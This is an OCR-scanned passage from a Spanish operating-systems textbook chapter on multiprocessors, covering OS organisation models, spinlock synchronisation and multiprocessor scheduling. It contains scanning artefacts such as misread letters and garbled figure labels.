En segundo lugar, como cada sistema operativo tiene sus propias tablas, también tiene su pro¬ 
pio conjunto de procesos que programa por su cuenta. No hay compartición de procesos. Si un usua¬ 
rio se conecta a la CPU 1, todos sus procesos se ejecutan en la CPU 1. Como consecuencia, puede 
ocurrir que la CPU 1 esté inactiva mientras la CPU 2 está cargada de trabajo. 

En tercer lugar, no hay compartición de páginas. Puede ocurrir que la CPU 1 tenga páginas de 
sobra, mientras que la CPU 2 esté paginando en forma continua. No hay forma deque la CPU 2 pi¬ 
da prestadas algunas páginas a la CPU 1, ya que la asignación de memoria es fija. 

En cuarto lugar (y lo que es peor), si el sistema operativo mantiene una caché en búfer de los 
bloques de disco de uso reciente, cada sistema operativo hace esto de manera independiente a los de¬ 
más. Por ende, puede ocurrir que haya cierto bloque de disco presente y sucio en varias cachés 
de búfer al mismo tiempo, con lo cual se producirán resultados inconsistentes. La única forma de evi¬ 
tar este problema es eliminar las cachés del búfer. Eso no es tan difícil, pero daña el rendimiento en 
forma considerable. 

Por estas razones, es muy raro que se utilice este modelo, aunque en los primeros días de los 
multiprocesadores sí se utilizaba, cuando el objetivo era portar los sistemas operativos existentes 
hacia algún multiprocesador nuevo, lo más rápido posible. 
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M ultiprocesadores maestro-esclavo 


En la figura 8-8 se muestra un segundo modelo. Aquí, hay una copia del sistema operativo y sus ta¬ 
blas presente en la CPU 1, y nada más ahí. Todas las llamadas al sistema se redirigen a la CPU 1 
para procesarlas ahí. La CPU 1 también puede ejecutar proceso de usuario si tiene tiempo desobra. 
A este modelo se le conoce como maestro-esclavo, ya que la CPU 1 es el maestro y todas los de¬ 
más son los esclavos. 


CPU 1 CPU 2 CPU 3 CPU 4 Memoria E/S 



Bus 

Figura 8.8. U n modelo de multiprocesador maestro-esclavo. 


El modelo maestro-esclavo resuelve la mayoría de los problemas del primer modelo. Hay una 
sola estructura de datos (por ejemplo, una lista o un conjunto de listas con prioridades) que lleva la 
cuenta de los procesos listos. Cuando una CPU está inactiva, pide al sistema operativo en la CPU 1 
un proceso para ejecutarlo, y se le asigna uno. Por ende, nunca puede ocurrir que una CPU esté inac¬ 
tiva mientras que otra esté sobrecargada. De manera similar, se pueden asignar las páginas entre to¬ 
dos los procesos en forma dinámica y sólo hay una caché de búfer, por lo que nunca ocurren 
inconsistencias. 

El problema con este modelo es que con muchas CPUs, el maestro se convertirá en un cuello 
de botella. Después de todo, debe manejar todas las llamadas al sistema de todas las CPUs. Si, por 
ejemplo, el 10% del tiempo está manejando llamadas al sistema, entonces con 10 CPUs el maestro 
casi se saturará y con 20 CPUs estará completamente sobrecargado. Por ende, este modelo es sim¬ 
ple y funciona para pequeños muí ti procesadores, pero no para los grandes. 

M ulti procesadores simétricos 

Nuestro tercer modelo, el SMP (Multiprocesador simétrico), elimina esta asimetría. Hay una co¬ 
pia del sistema operativo en memoria, pero cualquier CPU puede ejecutarlo. Cuando se hace una 
llamada al sistema, la CPU en la que se hizo la llamada al sistema atrapa para el kernel y procesa 
la llamada al sistema. El modelo SM P se ilustra en la figura 8-9. 

Este modelo equilibra los procesos y la memoria en forma dinámica, ya que sólo hay un con¬ 
junto de tablas del sistema operativo. También elimina el cuello de botella de la CPU, ya que no hay 
maestro, pero introduce sus propios problemas. En especial, si dos o más CPUs están ejecutando 
código del sistema operativo al mismo tiempo, se puede producir un desastre. Imagine que dos 
CPUs seleccionan el mismo proceso para ejecutarlo, o que reclaman la misma página de memoria 
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CPU 1 CPU 2 CPU 3 CPU 4 Memoria E/S 



Bus 


Figura 8-9. El modelo de multiprocesador SM P. 


libre. La solución más simple para estos problemas es asociar un mutex (es decir, bloqueo) con el 
sistema operativo, convirtiendo a todo el sistema en una gran región crítica. Cuando una CPU de¬ 
sea ejecutar código del sistema operativo, debe adquirir primero el mutex. Si el mutex está bloquea¬ 
do, sólo espera. De esta forma, cualquier CPU puede ejecutar el sistema operativo, pero sólo una a 
la vez. 

Este modelo funciona, pero casi tan mal como el modelo maestro-esclavo. De nuevo, suponga 
que 10% de todo el tiempo de ejecución se invierte dentro del sistema operativo. Con 20 CPUs, ha¬ 
brá largas colas de CPUs esperando entrar. Por fortuna, es fácil de mejorar. M uchas partes del sis¬ 
tema operativo son independientes unas de otras. Por ejemplo, no habría problema si una CPU 
ejecutara el planificador mientras que otra CPU manejara una llamada al sistema de archivos, y una 
tercera CPU estuviera procesando un fallo de página. 

Esta observación ocasiona que se divida el sistema operativo en varias regiones críticas inde¬ 
pendientes que no interactúan entre sí. Cada región crítica está protegida por su propio mutex, por 
lo que sólo una CPU ala vez puede ejecutarlo. De esta forma se puede lograr mucho más parale¬ 
lismo. Sin embargo, puede ocurrir que algunas tablas (como las de procesos) sean utilizadas por va¬ 
rias regiones críticas. Por ejemplo, la tabla de procesos es necesaria para la programación, pero 
también para la llamada al sistema fork y para el manejo de señales. Cada tabla que pueda ser uti¬ 
lizada por varias regiones críticas necesita su propio mutex. De esta forma, cada región crítica se 
puede ejecutar sólo por una CPU a la vez, y cada tabla crítica se puede utilizar sólo por una CPU a 
la vez. 

La mayoría de los multi procesadores modernos utilizan esta organización. La parte difícil so¬ 
bre escribir el sistema operativo para una máquina de este tipo no es que el código actual sea tan 
distinto de un sistema operativo regular. No es así. La parte difícil es dividirlo en regiones críticas 
que se puedan ejecutar de manera concurrente por distintas CPUs sin interferir unas con otras, ni si¬ 
quiera en formas sutiles e indirectas. Además, cada tabla utilizada por dos o más regiones críticas 
debe estar protegida por separado por un mutex, y todo el código que utilice la tabla debe utilizar 
el mutex en forma correcta. 

Además, hay que tener mucho cuidado para evitar los interbloqueos. Si dos regiones críticas 
necesitan la tabla A y la tabla B, y una de ellas reclama la tabla A primero y la otra reclama la tabla 
B primero, tarde o temprano ocurrirá un interbloqueo y nadie sabrá por qué. En teoría, a todas las 





























538 


SISTEMAS DE M ULTIPLES PROCESADORES 


CAPITULO 8 


tablas se les podrían asignar valores enteros y todas las regiones críticas podrían requerir la adqui¬ 
sición de tablas en orden ascendente. Esta estrategia evita los interbloqueos, pero requiere que el 
programador piense con mucho cuidado sobre cuáles tablas necesita cada región crítica, y realice 
las peticiones en el orden correcto. 

A medida que el código evoluciona con el tiempo, una región crítica puede llegar a necesitar 
una nueva tabla que no necesitaba antes. Si el programador es nuevo y no comprende la lógica com¬ 
pleta del sistema, entonces la tentación será sólo colocar el mutex en la tabla, en el punto en el que 
se necesitey liberarlo cuando ya no sea necesario. Sin importar qué tan razonable pueda parecer es¬ 
to, se pueden producir interbloqueos, que el usuario percibirá como si el sistema se paralizara. No 
es fácil hacerlo bien, y mantenerlo así durante un periodo de años frente a los cambios de progra¬ 
madores es muy difícil. 

8.1.3 Sincronización de multiprocesadores 

Con frecuencia, lasCPUsen un multiprocesador necesitan sincronizarse. Acabamos de ver el caso 
en el que las regiones críticas del kernel y las tablas se tienen que proteger mediante mutexes. A hora 
vamos a analizar con más detalle la forma en que funciona esta sincronización en un multiprocesa¬ 
dor. No carece de importancia, como pronto veremos. 

Para empezar, real mente se necesitan primitivas de sincronización apropiadas. Si un proceso en 
una máquina uniprocesador (sólo una CPU) realiza una llamada al sistema que requiera acceder a 
cierta tabla crítica del kernel, el código del kernel sólo tiene que deshabilitar las interrupciones an¬ 
tes de tocar la tabla. Después puede hacer su trabajo, sabiendo que podrá terminar sin que ningún 
otro proceso se entrometa y toque la tabla antes de que haya terminado. En un sistema multiproce¬ 
sador, deshabilitar las interrupciones sólo afecta a esa CPU, desshilitándola. Las demás CPUs se si¬ 
guen ejecutando y aún pueden tocar la tabla crítica. Como consecuencia, se debe utilizar un protocolo 
de mutex apropiado, el cual debe ser respetado por todas las CPUs para garantizar que funcione la 
exclusión mutua. 

El corazón de cualquier protocolo de mutex práctico es una instrucción especial que permite 
inspeccionar una palabra de memoria y establecerla en una operación indivisible. En la figura 2-22 
vimos cómo se utilizaba tsl (Probar y establecer bloqueo) para implementar regiones críticas. Co¬ 
mo vimos antes, lo que hace esta instrucción es leer una palabra de memoria y almacenarla en un 
registro. Al mismo tiempo, escribe un 1 (o cualquier otro valor distinto de cero) en la palabra de 
memoria. Desde luego que se requieren dos ciclos de bus para realizar las operaciones de lectura y 
escritura de memoria. En un uniprocesador, mientras que la instrucción no se pueda descomponer 
a mitad de ejecución, tsl siempre funcionará como se espera. 

Ahora piense en lo que podría ocurrirán un multiprocesador. En la figura 8-10 podemos ver la 
sincronización en el peor caso, en donde la palabra de memoria 1000, que se utiliza como bloqueo, 
en un principio es 0. En el paso 1, la CPU 1 lee la palabra y obtiene un 0. En el paso 2, antes de que 
la CPU 1 tenga la oportunidad devolver a escribir la palabra para quesea 1, la CPU 2 entra y tam¬ 
bién lee la palabra como un 0. En el paso 3, la CPU 1 escribe un 1 en la palabra. En el paso 4, la 
CPU 2 también escribe un 1 en la palabra. Ambas CPUs obtuvieron un 0 de la instrucción tsl, por 
lo que ambas tienen ahora acceso a la región crítica y falla la exclusión mutua. 
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Figura 8-10. La instrucción tsl puedefaiiar si ei bus no se puede bioquear. Estos cua¬ 
tro pasos muestran una secuencia de eventos en donde se demuestra ia faiia. 


Para evitar este problema, la instrucción tsl debe primero bloquear el bus, para evitar que otras 
CPUs lo utilicen; después debe realizar ambos accesos a la memoria, y luego desbloquear el bus. 
Por lo general, para bloquear el bus se hace una petición del bus usando el protocolo de petición de 
bus común, y después se declara (es decir, se establece a un 1 lógico) cierta línea de bus especial 
hasta que se hayan completado ambos ciclos. M ientras que esté declarada esta línea especial, nin¬ 
guna otra CPU obtendrá acceso al bus. Esta instrucción puede implementarse sólo en un bus que 
tenga las líneas necesarias y el protocolo (de hardware) para utilizarlas. Los buses modernos tienen 
estas facilidades, pero en los primeros que no las tenían, no era posible implementar la instrucción 
TSL en forma correcta. Ésta es la razón por la que se inventó el protocolo de Peterson: para sincro¬ 
nizar por completo en el software (Peterson, 1981). 

Si la instrucción tsl se implementa y utiliza en forma correcta, garantiza que la exclusión 
mutua pueda llegar a funcionar. Sin embargo, este método de exclusión mutua utiliza un bloqueo 
de giro debido a que la CPU que hace la petición sólo espera en un ciclo estrecho, evaluando el 
bloqueo lo más rápido que pueda. No sólo se desperdicia por completo el tiempo de la CPU (o 
CPUs) que hace la petición, sino que también se puede imponer una carga masiva en el bus o la 
memoria, reduciendo considerablemente a todas las demás CPUs que tratan de realizar su trabajo 
normal. 

En primera instancia, podría parecer que la presencia de la caché debería eliminar el problema 
de la contención del bus, pero no es así. En teoría, una vez que la CPU que hace la petición ha leí¬ 
do la palabra de bloqueo, debe obtener una copia en su caché. M ientras que ninguna otra CPU in¬ 
tente utilizar el bloqueo, la CPU que hace la petición debe ser capaz de salir de su caché. Cuando 
la CPU que posee el bloqueo escribe un 1 en la caché para liberarla, el protocolo de la caché inva¬ 
lida de manera automática todas las copias de ésta en las cachés remotas, con lo que se debe volver 
a obtener el valor correcto. 

El problema es que las cachés operan en bloques de 32 o 64 bytes. Por lo general, la CPU que 
contiene el bloqueo necesita las palabras que lo rodean. Como la instrucción tsl es una escritura 
(ya que modifica el bloqueo), necesita acceso exclusivo al bloque de la caché que contiene el blo¬ 
queo. Por lo tanto, cada instrucción tsl invalida el bloqueo en la caché de la CPU que contiene el 
bloqueo y obtiene una copia privada y exclusiva para la CPU que hace la petición. Tan pronto co¬ 
mo la CPU que contiene el bloqueo toca una palabra adyacente al mismo, el bloque de la caché se 
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mueve a su máquina. En consecuencia, todo ei bioquede ia caché que contiene ei bioqueo se trans¬ 
porta constantemente entre ei propietario dei bioqueo y ei que soiicita ei bioqueo, generando aún 
más tráfico en ei bus que ias iecturas individuaies en ia paiabra de bioqueo. 

Si pudiéramos deshacernos de todas ias escrituras inducidas por tsl en ei iado que hace ia 
petición, podríamos reducir ei thrashing de caché en forma considerabie. Este objetivo se puede 
iograr ai hacer que ia CPU que hace ia petición reai i ce primero una iectura pura, para ver si ei bio¬ 
queo está iibre. Sóio si ei bioqueo parece estar iibre es cuando se reaiiza una tsl para poder ad¬ 
quirido. Ei resuitado de este pequeño cambio es que ia mayoría de ios sondeos son ahora iecturas 
en vez de escrituras. Si ia CPU que contiene ei bioqueo sólo iee ias vari abies en ei mismo bioque 
de caché, cada una de eiias puede tener una copia dei bioque de ia caché en modo de sóio iectura 
compartido, eiiminando todas ias transferencias dei bioque de caché. Cuando por fin se iibera ei 
bioqueo, ei propietario reaiiza una escritura, ia cuai requiere acceso exciusivo, con io cuai se in- 
vaiidan todas ias otras copias en ias cachés remotas. En ia siguiente iectura que reai i ce ia CPU que 
hace ia petición, ei bioque de ia caché se voiverá a cargar. Observe que si hay dos o más CPUs 
contendiendo por ei mismo bioqueo, puede ocurrir que ambas vean que está iibre ai mismo tiem¬ 
po, y ambas puedan iiegar a reaiizar una operación tsl simuitánea para adquirido. Sóio una de 
estas operaciones tendrá éxito, por io que no hay condición de competencia aquí debido a que ia 
verdadera adquisición ia reaiiza ia instrucción tsl, y esta instrucción es atómica. Detectar que ei 
bioqueo está iibre y tratar de obtenerio de inmediato con una operación tsl no garantiza ia ob¬ 
tención dei mismo. A iguien más podría ganar, pero para que ei aigoritmo sea correcto, no impor¬ 
ta quién io obtenga. Ei éxito en ia iectura pura están sóio una sugerencia de que sería un buen mo¬ 
mento de adquirir ei bioqueo, pero no constituye una garantía de que ia adquisición tendrá 
éxito. 

Otra forma de reducir ei tráfico en ei bus es mediante ei uso dei popuiar aigoritmo de backoff 
exponenciai binario de Ethernet (Anderson, 1990). En vez de sondear en forma continua como en 
ia figura 2-22, se puede insertar un cicio de retraso entre ios sondeos. Ai principio, ei retraso es una 
instrucción. Si ei bioqueo sigue ocupado, ei retraso se dupiica a dos instrucciones, después a cua¬ 
tro instrucciones, y así hasta iiegar a cierto vaior máximo. Un máximo bajo ofrece una respuesta rá¬ 
pida cuando se iibera ei bioqueo, pero desperdicia másciciosdebusen ei thrashing de ia caché. Un 
máximo aito reduce ei thrashing de ia caché a expensas de no observar queei bioque está iibre con 
tanta rapidez. Ei aigoritmo de backoff exponenciai binario se puede utiiizar con o sin ias iecturas 
puras que van antes de ia instrucción tsl. 

Una idea mejor inciuso es proporcionar a cada CPU que desea adquirir ei mutex su propia va- 
riabie de bioqueo privada para evaiuaria, como se iiustra en ia figura 8-11 (M eiior-Crummey y 
Scott, 1991). La variabie debe residir en un bioque de caché no utiiizado, para evitar confiictos. Ei 
aigoritmo funciona ai hacer que una CPU que no puede adquirir ei bioqueo asigne una variabie de 
bioqueo y se adjunte a sí misma ai finai de una iista de CPUs que esperan ei bioqueo. Cuando ia 
CPU que contiene ei bioque saiede ia región crítica, iibera ei bioqueo privado que ia primera CPU 
en ia iista está evaiuando (en su propia caché). Después, esta CPU entra a ia región crítica. Cuando 
termina, iibera ei bioqueo que está usando su sucesora, y así en io sucesivo. Aunque ei protocoio es 
aigo compiicado (para evitar que dos CPUs se adjunten a sí mismas ai finai de ia iista ai mismo 
tiempo), es eficiente y iibre de inanición. Para obtener todos ios detai i es, ios i ectores deberán con- 
suitar ei artícuio. 
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Figura 8-11. Uso de varios bloqueos para evitar el thrashing de la caché. 


Comparación entre espera activa y conmutación 

Hasta ahora hemos asumido que una CPU que necesita un mutex bloqueado sólo lo espera, ya sea 
mediante un sondeo continuo, un sondeo intermitente o adjuntándose a sí misma a una lista de 
CPUs en espera. Algunas veces no hay alternativa para que la CPU que hace la petición sólo espe¬ 
re. Por ejemplo, suponga que cierta CPU está inactiva y necesita acceder a la lista compartida de 
procesos listos para elegir un proceso y ejecutarlo. Si la lista de procesos listos está bloqueada, la 
CPU no puede sólo decidir suspender lo que está haciendo y ejecutar otro proceso, ya que para ello 
tendría que leer la lista de procesos listos. Debe esperar hasta que pueda adquirir esa lista. 

Sin embargo, en otros casos hay una opción. Por ejemplo, si algún hilo en una CPU necesita 
acceso a la caché del búfer del sistema de archivos y actualmente está bloqueada, la CPU puede de¬ 
cidir cambiar a un hilo distinto en vez de esperar. La cuestión de si debe hacer una espera activa o 
realizar un cambio de hilo ha sido tema de mucha investigación, parte de la cual analizaremos a con¬ 
tinuación. Observe que esta cuestión no ocurre en un uniprocesador, ya que no tiene mucho senti¬ 
do una espera activa cuando no hay otra CPU para liberar el bloqueo. Si un subproceso trata de 
adquirir un bloqueo y falla, siempre se bloquea para dar al propietario del bloqueo la oportunidad 
de ejecutarse y liberar el bloqueo. 

Suponiendo que la espera activa y realizar un cambio de hilo son opciones viables, hay que ha¬ 
cerla siguiente concesión. La espera activa desperdicia ciclos de la CPU de manera directa: evaluar 
un bloqueo en forma repetida no es un trabajo productivo. Sin embargo, cambiar de hilo también 
desperdicia ciclos de la CPU, ya que se debe guardar el estado del hilo actual, se debe adquirir el 
bloqueo sobre la lista de procesos listos, hay que seleccionar un hilo, se debe cargar su estado y de¬ 
be iniciarse. Además, la caché de la CPU contendrá todos los bloques incorrectos, por lo que ocu¬ 
rrirán muchos fallos de caché a medida que el nuevo hilo se empiece a ejecutar. También es 
probable que ocurran fallos deTLB. En un momento dado se realizará un cambio de vuelta al hilo 
original, y le seguirán más fallos de caché. Además de los fallos de caché, se desperdician los ci¬ 
clos invertidos en estos dos cambios de contexto. 
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Por ejemplo, si se sabe que los mutexes se contienen generalmente durante 50 pseg, y se re¬ 
quiere 1 mseg para cambiar del hilo actual, y 1 mseg para volver a cambiar posteriormente, es más 
eficiente una espera activa sobre el mutex. Por otra parte, si el mutex promedio se contiene duran¬ 
te 10 mseg, vale la pena el esfuerzo de realizar los dos cambios de contexto. El problema es que las 
regiones críticas pueden variar de manera considerable en cuanto a su duración, así que, ¿cuál mé¬ 
todo es mejor? 

U n diseño es una espera activa todo el tiempo: un segundo diseño es siempre cambiar. U n ter¬ 
cer diseño es tomar una decisión por separado cada vez que nos encontramos con un mutex blo¬ 
queado. Al momento en que se tiene que tomar la decisión, no se sabe si esmejor realizar una espera 
activa o cambiar, pero para cualquier sistema dado, es posible realizar un rastreo de toda la activi¬ 
dad y anal izarla después fuera delinea. Así, podemos saber en retrospectiva cuál decisión fue la me¬ 
jor y cuánto tiempo se desperdició en el mejor caso. Este algoritmo de retrospección se convierte 
entonces en un punto de referencia contra el que se pueden medir los algoritmos viables. 

Los investigadores han estudiado este problema (Karlin y colaboradores, 1989; Karlin y colabo¬ 
radores, 1991; Ousterhout, 1982). La mayor parte del trabajo utiliza un modelo en el que un hilo que 
no puede adquirir un mutex gira durante cierto periodo. Si se excede este umbral, hace el cambio. En 
algunos casos se corrige el umbral, que por lo general es la sobrecarga conocida por cambiar a otro 
hilo y después cambiar devuelta. En otros casos es dinámico, dependiendo de la historia observada 
del mutex sobre el que se espera. 

Los mejores resultados se obtienen cuando el sistema lleva el rastro de los últimos tiempos de 
espera activa observados, y asume que éste será similar a los anteriores. Por ejemplo, suponiendo 
un tiempo de cambio de contexto de 1 mseg otra vez, un hilo realiza una espera activa por un má¬ 
ximo de 2 mseg, pero observe cuánto tiempo giró en realidad. Si no puede adquirir un bloqueo y 
detecta que en las tres ejecuciones anteriores esperó un promedio de 200 pseg, debe hacer una es¬ 
pera activa por 2 mseg antes de cambiar de hilo. Pero si detecta que la espera activa dura los 2 mseg 
completos en cada uno de los intentos anteriores, debe cambiar de inmediato y no realizar una es¬ 
pera activa. Encontrará más detalles en (Karlin y colaboradores, 1991). 


8.1.4 Planificación de multiprocesadores 

Antes de analizar la forma en que se realiza la planificación en los multiprocesadores, es necesario 
determinar qué es lo que se va a planificar. En los días de antaño, cuando todos los procesos tenían 
un solo hilo, los procesos eran los que se planificaban; no había nada más que se pudiera planificar. 
Todos los sistemas operativos modernos soportan procesos multihilo, lo cual complica aún más la 
planificación. 

Es importante saber si los hilos son de kernel o de usuario. Si la ejecución de hilos se lleva a 
cabo mediante una biblioteca en espacio de usuario y el kernel no sabe nada acerca de los hilos, en¬ 
tonces la planificación se lleva a cabo con base en cada proceso, como siempre. Si el kernel ni si¬ 
quiera sabe que los hilos existen, es muy difícil que pueda planificarlos. 

Con los hilos del kernel sucede algo distinto. Aquí el kernel está al tanto de todos los hilos 
y puede elegir y seleccionar de entre los hilos que pertenecen a un proceso. En estos sistemas, la 
tendencia es que el kernel seleccione un hilo para ejecutarlo, y el proceso al que pertenece sólo 
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tiene un pequeño papel (o tal vez ninguno) en el algoritmo de selección de hilos. A continuación 
hablaremos sobre la planificación de hilos, pero desde luego que, en un sistema con procesos con 
un solo hilo, o con hilos implementados en espacio de usuario, son los procesos los que se pro¬ 
graman. 

Proceso contra hilo no es la única cuestión de planificación. En un uniprocesador, la planifi¬ 
cación es de una dimensión. La única pregunta que hay que responder (repetidas veces) es: 
"¿Cuál hilo se debe ejecutar a continuación?". En un multiprocesador, la planificación tiene dos 
dimensiones: el planificador tiene que decidir qué hilo ejecutar y en cuál CPU lo va a ejecutar. 
Esta dimensión adicional complica de manera considerable la planificación en los multiprocesa- 
dores. 

Otro factor que complica las cosas es que, en ciertos sistemas, ninguno de los hilos está re¬ 
lacionado, mientras que en otros se dividen en grupos donde todos pertenecen a la misma aplica¬ 
ción y trabajan en conjunto. Un ejemplo del primer caso es un sistema de tiempo compartido, en 
el que usuarios independientes inician procesos independientes. Los hilos de los distintos proce¬ 
sos no están relacionados, y cada uno de ellos se puede planificar de manera independiente a los 
demás. 

Un ejemplo del segundo caso ocurre con regularidad en los entornos de desarrollo de progra¬ 
mas. A menudo, los sistemas extensos consisten de cierto número de archivos de encabezado que 
contienen macros, definiciones de tipos y declaraciones de variables que utilizan los archivos de có¬ 
digo actuales. Cuando se modifica un archivo de encabezado, se deben volver a compilar todos los 
archivos de código que lo incluyen. El programa make se utiliza comúnmente para administrar el 
desarrollo. Cuando se invoca make, inicia la compilación sólo de aquellos archivos de código que 
se deben volver a compilar debido a las modificaciones realizadas en el encabezado o los archivos 
de código. Los archivos de código objeto que siguen siendo válidos no se regeneran. 

La versión original de make realizaba su trabajo en forma secuencial, pero las versiones más 
recientes diseñadas para multiprocesadores pueden iniciar todas las compilaciones a la vez. Si se 
necesitan 10 compilaciones, no tiene caso programar 9 de ellas para que se ejecuten de inmediato 
y dejar la última hasta mucho después, ya que el usuario no percibirá el trabajo como terminado si¬ 
no hasta que termine la última compilación. En este caso, tiene sentido considerar los hilos que rea¬ 
lizan las compilaciones como si fueran un grupo, y tomar eso en cuenta al programarlos. 

Tiempo compartido 

Vamos a analizar el caso de la programación de hilos independientes: más adelante consideraremos 
cómo planificar hilos relacionados. El algoritmo de planificación más simple para lidiar con hilos 
no relacionados es tener una sola estructura de datos a nivel de sistema para los hilos que estén lis¬ 
tos, que tal vez sea sólo una lista, pero es mucho más probable que sea un conjunto de listas para 
los hilos con distintas prioridades, como se i lustra en la figura 8-12(a).Aquí, las 16 CPU s están ocu¬ 
padas en un momento dado, y hay un conjunto de 14 hilos por orden de prioridad, esperando ser 
ejecutados. La primera CPU en terminar su trabajo actual (o en hacer que su hilo se bloquee) es la 
CPU 4, que después bloquea las colas de programación y selecciona el hilo con mayor prioridad 
(A), como se muestra en la figura 8-12(b). A continuación, la CPU 12 queda inactiva y selecciona 
el hilo B, como se ilustra en la figura 8-12(c). M ientras que los hilos no estén relacionados de nin- 
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guna manera, es una opción razonable llevar a cabo la planificación de esta forma, y es muy sim¬ 
ple de implementar con eficiencia. 
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Figura 8-12. Uso de una sola estructura de datos para programar un multiprocesador. 

Al tener una sola estructura de datos de planificación utilizada por todas las CPUs, éstas se 
comparten en el tiempo, de igual forma que como se hace en un sistema uniprocesador. También 
se proporciona un balance automático de la carga, ya que no puede haber una CPU inactiva mien¬ 
tras otras están sobrecargadas. Dos desventajas de este método son: la potencial contención por la 
estructura de datos que se utiliza en la programación a medida que aumenta el número de CPUs, y 
la sobrecarga usual que se produce al realizar un cambio de contexto, cuando un hilo se bloquea en 
espera de una operación de E/S. 

También es posible que ocurra un cambio de contexto al momento en que expire el quantum 
de un hilo, por ejemplo, en un multi procesador, que tiene ciertas propiedades que no están presen¬ 
tes en un uni procesador. Suponga que el hilo contiene un bloqueo de espera activa al momento en 
que expira su quantum. Las otras CPUs que esperan a que se libere el bloqueo de espera activa só¬ 
lo desperdician su tiempo en una espera activa hasta que se vuelve a programar ese hilo y se libera 
el bloqueo. En un uni procesador, los bloqueos de espera activase utilizan raras veces, porloque si 
un proceso se suspende mientras contiene un mutex, y otro hilo se inicia y trata de adquirir el mu- 
tex, se bloqueará de inmediato, por lo que no se desperdicia mucho tiempo. 

Para solucionar esta anomalía, algunos sistemas utilizan la planificación inteligente, en la cual 
un hilo que adquiere un bloqueo de espera activa establece una bandera a nivel de proceso, para 
mostrar que actualmente tiene un bloqueo de espera activa (Zahorjan y colaboradores, 1991). AI li¬ 
berar el bloqueo, se borra la bandera. Así, el planificador no detiene un hilo que contenga un blo¬ 
queo de espera activa, sino que le da un poco más de tiempo para que complete su región crítica y 
libere el bloqueo. 

Otra cuestión que desempeña un papel en la planificación es el hecho de que aunque todas las 
CPUs son iguales, ciertas CPUs son más iguales que otras. En especial, cuando el subproceso A se 
ha ejecutado durante mucho tiempo en la CPU k, la caché de esta CPU estará llena de bloques de 
A. Si A se vuelve a ejecutar poco tiempo después, tal vez su rendimiento sea mejor si se ejecuta en 
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la CPU k debido a que la caché de esta CPU tal vez todavía contenga algunos de los bloques de A. 
Cuando se cargan previamente los bloques en la caché se incrementa la proporción de aciertos y, en 
consecuencia, la velocidad del hilo. Además, se puede dar el caso de que la TLB contenga las pá¬ 
ginas correctas, con lo cual se reducen sus fallas. 

Algunos muí ti procesadores toman en cuenta este efecto y utilizan lo que se conoce como pla¬ 
nificación por afinidad (Vaswani yZahorjan, 1991). Aquí, la idea básica es esforzarse en serio por 
hacer que un hilo se ejecute en la misma CPU en que se ejecutó la última vez. Una manera de crear 
esta afinidad es mediante el uso de un algoritmo de planificación dedos niveles. Cuando se crea 
un hilo, éste se asigna a una CPU, por ejemplo con base en cuál de las CPUs tiene la menor carga 
en ese momento. Esta asignación de hilos a CPUs es el nivel superior del algoritmo. Como resulta¬ 
do de esta directiva, cada CPU adquiere su propia colección de hilos. 

La planificación actual de los hilos es el nivel inferior del algoritmo. Cada CPU la realiza por 
separado, mediante el uso de prioridades o de algún otro medio. Al tratar de mantener un hilo en la 
misma CPU durante todo su tiempo de vida, se maximiza la afinidad de la caché. No obstante, si 
una CPU no tiene hilos qué ejecutar, obtiene uno de otra CPU en vez de quedar inactiva. 

La planificación de dos niveles tiene tres beneficios. En primer lugar, distribuye la carga de una 
manera casi uniforme sobre las CPUs disponibles. En segundo lugar, se aprovecha la afinidad de la 
caché siempre que sea posible. En tercer lugar, al dar a cada CPU su propia lista de hilos listos se 
minimiza la contención por estas listas, ya que es muy poco frecuente que una CPU intente utilizar 
la lista de hilos listos de otra CPU. 

Espacio compartido 

El otro método general para la planificación de multiprocesadores se puede utilizar cuando los hilos 
están relacionados entre sí de alguna manera. A nteriormente mencionamos el ejemplo del programa 
make paralelo como uno de los casos. También ocurre con frecuencia que un solo proceso tenga va¬ 
rios hilos que trabajen en conjunto. Por ejemplo, si los hilos de un proceso se comunican con mucha 
frecuencia, es conveniente hacer que se ejecuten al mismo tiempo. A la planificación de varios hilos 
al mismo tiempo, esparcidos sobre varias CPUs, se le conoce como espacio compartido. 

El algoritmo de espacio compartido más simple funciona de la siguiente manera. Suponga que 
se crea un grupo completo de hilos relacionados al mismo tiempo. Al momento de su creación, el 
programador comprueba si hay tantas CPUs libres como el número de hilos. Si las hay, a cada hilo 
se le proporciona su propia CPU dedicada (es decir, sin multi programación) y todos empiezan su 
ejecución. Si no hay suficientes CPUs, ninguno de los hilos se iniciará, sino hasta que haya sufi¬ 
cientes CPUs disponibles. Cada hilo se aterra a su CPU hasta que termina, y en ese momento la 
CPU se regresa a la reserva de CPUs disponibles. Si un hilo se bloquea en espera de una operación 
de E/S, de todas formas retiene a la CPU, que simplemente se queda inactiva hasta que el hilo se 
despierta. Cuando aparece el siguiente lote de hilos, se aplica el mismo algoritmo. 

En cualquier instante, el conjunto de CPUs se divide de manera estática en cierto número de 
particiones, cada una de las cuales ejecuta los hilos de un hilo. Por ejemplo, en la figura 8-13 hay 
particiones con 4, 6, 8 y 12 CPUs, y hay 2 CPUs sin asignar. Con el tiempo cambiará el número y 
el tamaño de las particiones, a medida que se creen nuevos hilos y cuando los anteriores terminen 
de ejecutarse. 


546 


SISTEMAS DE M ULTIPLES PROCESADORES 


CAPITULO 8 


Partición con 
8CPUS 


Partición con ■ 
eCPUs 


0 □ 0 0 

0_.E]_0-0 
0 0 0 
^ 


0 0 0;¡0 
0 0 0:0 


1^ |22|;;|23 


CPU sin asignar 




' Partición con 
12 CPUs 


Partición con 
4 CPUs 


Figura 8-13. Un conjunto de32 CPUs divididas en cuatro particiones, con dos CPUs 
disponibles. 


De vez en cuando hay que tomar decisiones sobre planificación. En los sistemas con uniproce- 
sador, el algoritmo "el trabajo más corto primero" es un algoritmo popular para la programación por 
lotes. El algoritmo análogo para un multiprocesador es seleccionar el proceso que necesita el me¬ 
nor número de ciclos de la CPU; es decir, el hilo cuyo valor de la multiplicación "cuenta de la CPU 
X tiempo de ejecución" sea el menor de todos. No obstante, en la práctica esta información raras 
veces está disponible, por lo que es difícil llevar a cabo el algoritmo. De hecho, los estudios han de¬ 
mostrado que, en la práctica, es difícil vencer al algoritmo "primero en llegar, primero en ser aten¬ 
dido" (Kruegery colaboradores, 1994). 

En este modelo simple de particionamiento, un hilo sólo pide cierto número de CPUs y los ob¬ 
tiene todos, o tiene que esperar hasta que estén disponibles. Una metodología distinta es que los hi¬ 
los administren de manera activa el grado de paralelismo. Un método para administrar el 
paralelismo es tener un servidor central que lleve la cuenta de cuáles hilos se están ejecutando, cuá¬ 
les desean ejecutarse y cuáles son sus requerimientos de CPU mínimos y máximos (Tucker y Gup- 
